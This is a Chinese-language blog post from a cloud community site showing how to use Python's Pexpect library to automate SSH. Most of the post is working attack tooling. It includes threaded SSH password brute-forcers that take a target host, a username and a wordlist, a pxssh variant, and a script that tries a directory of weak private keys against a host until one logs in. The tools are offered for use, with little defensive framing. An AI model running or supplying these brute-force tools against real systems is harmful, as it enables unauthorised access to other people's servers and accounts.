Python 运用Pexpect实现SSH爆破

举报
微软技术分享 发表于 2022/12/21 18:11:41 2022/12/21
【摘要】 Pexpect是一个纯Python模块,用于生成子应用程序;控制他们;并对输出中的预期模式作出响应。Pexpect的工作原理类似于Don Libes的Expect。Pexpect允许脚本生成一个子应用程序,并像键入命令一样控制它。Pexpect可用于自动化交互应用程序,如ssh、ftp、passwd、telnet等。它可用于自动化安装脚本,以在不同服务器上复制软件包安装。它可以用于自动化软件...

Pexpect是一个纯Python模块,用于生成子应用程序;控制他们;并对输出中的预期模式作出响应。Pexpect的工作原理类似于Don Libes的Expect。Pexpect允许脚本生成一个子应用程序,并像键入命令一样控制它。Pexpect可用于自动化交互应用程序,如ssh、ftp、passwd、telnet等。它可用于自动化安装脚本,以在不同服务器上复制软件包安装。它可以用于自动化软件测试。

pexpect与SSH交互

#coding=utf-8
import pexpect
from threading import *

def SSHConnect(Host,User,Password,Port):
    PROMPT = ["# ",">>> ","> ","\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
    try:
        # 为ssh命令生成一个spawn类的对象
        child = pexpect.spawn(connStr,timeout=1)
        # 期望有ssh_newkey字符、提示输入密码的字符出现,否则超时
        ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        if ret == 1:
        # 发送yes回应ssh_newkey并期望提示输入密码的字符出现
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        # 发送密码
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except Exception:
        pass
        return 0
child = SSHConnect("192.168.1.20","root","123","22")
print(child)

pexpect登录执行命令

#-*- coding:UTF-8 -*-
import pexpect

def ssh(user,host,password,port,command):
    child = pexpect.spawn('ssh -l %s %s -p %s %s' %(user,host,port,command))
    # 0 : 连接超时
    # 1 :ssh有时候提示你是否确认连接
    # 2 :提示输入密码
    # 3 :匹配到#号,表示命令已经执行完毕
    ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
    if ret == 0:                   # 连接超时
        return 0
    elif ret == 1:                 # SSH提示你是否确认连接
        child.sendline ('yes')     # 我们输入yes
        child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
        ret = child.expect([pexpect.TIMEOUT, 'password: '])
        if ret == 0:               # 连接超时
            return 0
    ret = child.sendline(password)
    if ret == 5:
        child.expect(pexpect.EOF)
        return child.before
    return 0

if __name__ =='__main__':
    try:
        host='192.168.1.20'
        user="root"
        password = '1233'
        command="ifconfig"
        child = ssh(user,host,password,"22",command)
        print(child)
    except Exception as e:
        print (e)

pexpect暴力破解SSH

#coding=utf-8
import pexpect
import os,sys
import threading
from optparse import OptionParser

def SSHConnect(Host,User,Password,Port):
    PROMPT = ["# ",">>> ","> ","\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + User + '@' + Host + ' -p ' + Port
    try:
        # 为ssh命令生成一个spawn类的对象
        child = pexpect.spawn(connStr , timeout=1)
        # 查询是否存在 ssh_newkey 里面的字符串、提示输入密码的字符出现,否则超时
        ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        if ret == 1:
        # 发送yes回应ssh_newkey并等待,提示输入密码的字符出现
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        if ret == 0:
            return 0
        # 发送密码
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except Exception:
        pass
        return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
    # 加锁
    semaphore.acquire()
    RetCode = SSHConnect(Host,User,Password,Port)
    if RetCode == 1:
        print("[+] --> 主机: {} 状态码: {} -------> 密码: {}".format(Host,RetCode,Password))
    else:
        # 释放锁
        print("[-] --> 主机: {} 状态码: {}".format(Host,RetCode))
        semaphore.release()

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-H","--host",dest="host",help="set host 192.168.1.1")
    parser.add_option("-u","--user",dest="user",help="set user root")
    parser.add_option("-p","--port",dest="port",help="set port 22")
    parser.add_option("-f","--file",dest="file",help="set file wordlist.log")
    (options,args) = parser.parse_args()
    if options.host and options.user and options.port and options.file:
        # 设置线程锁,每次执行5个线程
        semaphore = threading.Semaphore(5)
        fp = open(options.file,"r")
        PassList = fp.readlines()
        for item in PassList:
            t = threading.Thread(target=ThreadBlast,args=(options.host,options.user,item,options.port,semaphore))
            t.start()
    else:
        parser.print_help()

pxssh暴力破解SSH

# -*- coding: utf-8 -*-
import optparse
from pexpect import pxssh
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0

def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found " + password)
        Found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()

def main():
    parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, "r")
    for line in fn.readlines():
        if Found:
            # 如果发现了密码就退出
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Too Many Socket Timeouts")
            exit(0)
        connection_lock.acquire()
        password = line.strip("\r").strip("\n")
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()

if __name__ == "__main__":
    main()

利用SSH中的弱密钥

#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *

maxConnections = 5
#定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

def connect(host,user,keyfile,release):

    global Stop
    global Fails

    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#', ])
        #匹配到ssh_newkey
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        #匹配到conn_closed
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        #匹配到提示符'$','#',
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            #释放锁
            connection_lock.release()

def main():
    parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H <target host> -u <username> -d <directory>')
    parser.add_option('-H',dest='host',type='string',help='specify target host')
    parser.add_option('-u',dest='username',type='string',help='target username')
    parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')
    (options,args) = parser.parse_args()

    if (options.host == None) | (options.username == None) | (options.passDir == None):
        print parser.usage
        exit(0)

    host = options.host
    username = options.username
    passDir = options.passDir

    #os.listdir()返回指定目录下的所有文件和目录名
    for filename in os.listdir(passDir):
        if Stop:
            print '[*] Exiting: Key Found.'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: Too Many Connections Closed By Remote Host.'
            print '[!] Adjust number of simultaneous threads.'
            exit(0)
        #加锁
        connection_lock.acquire()

        #连接目录与文件名或目录
        fullpath = os.path.join(passDir,filename)
        print '[-] Testing keyfile ' + str(fullpath)
        t = Thread(target=connect,args=(username,host,fullpath,True))
        child = t.start()

if __name__ =='__main__':
    main()
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。